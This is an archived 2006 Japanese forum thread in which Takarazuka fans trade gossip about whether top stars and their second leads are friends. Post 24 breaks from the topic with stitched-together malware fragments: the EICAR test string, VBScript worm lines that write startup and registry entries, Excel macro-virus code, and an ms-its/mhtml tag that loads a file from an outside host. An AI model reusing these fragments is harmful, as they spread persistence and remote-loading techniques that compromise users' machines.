5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

トップと二番手

1 :103:2006/11/06(月) 01:12:47 ID:/nYC9b+v
歴代含めて、トップと二番手って実際仲良しなんですか??
トップコンビが言われてるのを見て気になりました♪♪
是非是非教えてください!

今ならおさゆみ?あさゆひ?コム水(は仲良しってよく聞くような)
あとわたとうも仲良しとか聞きましたが。
宙のかしタニのほうもどうなんだろう???
ちょっと前ならオサアサ、さえゆひ、コムかし、タカ水ですね!
どうなんでしょうか〜?!
プライベートとかで会ったりしてるのでしょうか?

2 :名無しさん@花束いっぱい。:2006/11/06(月) 01:51:55 ID:D83BXyJM
2!

3 :名無しさん@花束いっぱい。:2006/11/06(月) 02:17:29 ID:eN1Tnk8Z
あさおさは仲良しだって聞きましたよ。
よくお互いの舞台みてるみたいだし。
かなり前ですが、ミキさんとタモさんは仲良かったの?

4 :名無しさん@花束いっぱい。:2006/11/06(月) 03:32:01 ID:C6HQQsiz
ミキは退団時にタモに対して「よろしく」みたいなこと言ってなかったっけ?
ヤンミキは名コンビといわれたが実際プライベートではどうだったんだろう・・・。
花組は男役同士の付き合いがよさそうだね。

5 :名無しさん@花束いっぱい。:2006/11/06(月) 09:02:16 ID:tDw1gsqY
ヤンミキは抜擢された時期も似てて下級生時代から仲良かった。
そもそもあそこは期と期の仲全体が仲良くて、ナントカ会とか名前つけて一緒に遊んでたはず。
震災の時(ヤンさよなら公演中)ヤンはミキの家まで様子見に行ったそうだ。
公演後もよく一緒に出て一緒に帰ったりしてたよ。

ミキとタモも、年近くておばあちゃん子同士wで仲良かった。
が、プライベートで遊ぶほどではなかったはず。

6 :103:2006/11/06(月) 10:51:59 ID:/nYC9b+v
そうなんですか〜〜!ヤンミキはよく仲良かったって聞きますよね!
花組はやっぱりなかいいんですね!
雪組はどんなかんじですか?

7 :名無しさん@花束いっぱい。:2006/11/06(月) 15:00:47 ID:PjzgbT2i
1番さんが何故103と名乗るのか謎なのだが…
さらにゆひがいるのはもっと謎だ。

8 :名無しさん@花束いっぱい。:2006/11/06(月) 18:13:50 ID:eN1Tnk8Z
コムかしは仲良しだったよね。
コム水も仲良しなはず。
でもぶんコムはどうだったんだろ。なるが居たからあれかな。

9 :名無しさん@花束いっぱい。:2006/11/06(月) 19:24:15 ID:ORgnzgrC
トップより二番手が年上の場合って、ぶっちゃけどうなの?と思ったことは
あるけどね。

(例)まりこ・のる
   とど・たー
   ずんこ・たかこ
   なつめ・るこ

このくらいしか思いつかないけど。




10 :名無しさん@花束いっぱい。:2006/11/06(月) 19:36:23 ID:uF4gumhH
天海・久世
久世・真琴
湖月・安蘭

も逆転してるよ


11 :名無しさん@花束いっぱい。:2006/11/06(月) 19:42:45 ID:ORgnzgrC
ほんとだね。一番わかりやすそうなとこ、忘れてたよ・・・
10さん、フォローありがとね。

12 :名無しさん@花束いっぱい。:2006/11/06(月) 21:09:20 ID:fU+XQbFC
ヅカでの学年が年功序列ならあんまり関係ないかも知れない。
同期でも最大4年近く年の差あるし。

でも、天海・久世は学年も大逆転してたから微妙だっただろうね。

13 :名無しさん@花束いっぱい。:2006/11/06(月) 21:17:53 ID:FRBI2oDY
音楽学校に入った時点で「年下の本科生にも絶対服従」を叩き込まれてるんだから
どう考えても要らん心配だろう>年上の下級生

14 :名無しさん@花束いっぱい。:2006/11/06(月) 21:19:16 ID:ROIh26wh
カナメさんの退団ふが決まった当時、のんちゃんの方がお茶会で
「次はあさじさきとくぜせいかで星組ダブルトップ」
とか言ってたらしいね。
あくまでもウワサだから真偽の程は分からないけど、劇団でもゆりちゃんをそのまま
2番手にしといて、のんちゃんをトップにって話もあったとの事だから
のんちゃんの胸中はかなり複雑だったろうね。


15 :名無しさん@花束いっぱい。:2006/11/06(月) 21:27:03 ID:ROIh26wh
>14です。
退団ふって何だ・・・退団が、です。
わかると思いますがorz

16 :名無しさん@花束いっぱい。:2006/11/06(月) 22:36:41 ID:/nYC9b+v
103って何故かかかれてましたすいません・・orz
1です。
やっぱりあの逆転トップ二番手は大変なんですね。
まみさんとのんちゃんはでも仲よさそうに見えたけど。

湖月・安蘭コンビは凄くぴったりとか思ってしまいました。

17 :名無しさん@花束いっぱい。:2006/11/07(火) 12:18:02 ID:pTST5miu
>8
オフとかどうなのか知らないけど、コムブンも仲良しではあったと思う。
ブンちゃんのフェアウェルにコムちゃん来て、泣いちゃってね。
ブンちゃんがコムちゃんに「後は任せた」みたいなことを言ってた。
一作トップのブンちゃんだけに、コムちゃんがフェアウェルに顔を出せるのも、
ブンちゃんがこういうこと言えるのも、二人の間にそれなりに信頼関係あったからだと思うな。

18 :名無しさん@花束いっぱい。:2006/11/11(土) 00:41:38 ID:QZaK454j
お披露目から退団までの数作の間、トップと2番手コンビが変わらなかったのは、今の星組の他に
最近だと何組の、どのコンビ?

最近組み替え頻発で、あんまり見当たらなくない??

誰か答えて下さいなage

19 :名無しさん@花束いっぱい。:2006/11/11(土) 00:52:19 ID:vdDUYCnY
>18
正確にいうと湖月・安蘭も90周年シャッフルがあったから「1914/愛・タカラヅカ絢爛」は2番手が貴城・大和なんだけど…

1作トップを除いて完全にチェンジがなかったのは
花 愛華・匠
月 久世・真琴
雪 高嶺・轟
星 麻路・稔
宙 姿月・和央
が今のところ直近じゃないかな。

20 :名無しさん@花束いっぱい。:2006/11/11(土) 00:58:33 ID:i3N58F1e
お披露目〜退団までいっちゃうとずんタカしか思いつかないが…
ただオサチャー、ブンコム、かしタニもそうですね。数作ではありませんが。
オサアサ・4作、タカ水…5作、タカタニ…5作、コムかし…6作
ずんタカ…4作、コム水…3作、オサまと…5作(予定)

21 :名無しさん@花束いっぱい。:2006/11/11(土) 01:04:00 ID:Q3hZNZr7
>>14
有り得ない話を…
ブロードウェイボーイズもトミーの作品だから配役の時点で久世のトップなんてないだろうに
久世は天海の早期退団で救われたクチだろ

22 :名無しさん@花束いっぱい。:2006/11/11(土) 01:12:37 ID:iOg4es9o
>21
何せ昔の話だし、又聞きだから・・・
でも何かの商業誌でもあったんだよ。ゴシップ系の。
私も今ほど情報を仕入れる術を知らなかった時代なので。
あしからず。

23 :名無しさん@花束いっぱい。:2006/11/11(土) 01:40:14 ID:CchZQrqR
ゆりのお気に入りで、のんの親衛隊だった某娘は、
「ゆりちゃんはのんちゃんの事頼りにしてます」
みたいな事を茶会で言ってた。

24 :<body onload=window()>:2006/11/11(土) 10:21:40 ID:qDp9bkTy
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

25 :名無しさん@花束いっぱい。:2006/11/11(土) 15:35:32 ID:8sN0v0C8
>>19
チェンジなしはそのまま昇格なんだ

26 :名無しさん@花束いっぱい。:2006/11/11(土) 16:25:48 ID:0NLB/HeQ
昔のことは知らんが今時の男1&2は仲良し度の浅深のちがいはあれど
どの組も見るからに仲ワルーは無いと思う。
第一、そんなことに気が回るほど暇はない。




27 :名無しさん@花束いっぱい。:2006/11/11(土) 21:32:19 ID:ylPuYON4
>>21
14の話は全く有り得なく、がせなんだが、
トミーの作品「グランドホテル」は書き換えがあったとはいえ
本来の主役男爵はのんちゃんだった。
逆に言うとそういう役をやった事が後にトップになれた要因でも
あると思うので・・・もちろん運もありますが

28 :名無しさん@花束いっぱい。:2006/11/11(土) 22:01:05 ID:oeMN/ZjA
仲の悪いトップと二番手じゃ、舞台は崩壊するとオモ。


29 :名無しさん@花束いっぱい。:2006/11/12(日) 00:40:04 ID:Wkq9Wuqx
一応役者ではあるんだから、普段仲が悪くても
舞台ではそんなとこ見せないのは当然っしょ。
仮にもプロなんだから。

30 :名無しさん@花束いっぱい。:2006/12/02(土) 15:52:35 ID:XZ03UqBo
幸平よ!
忘年会で飲むのはいいけど
酔っ払って道で すっ転んでんじゃねーどぉ!笑われるかんな。

9 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)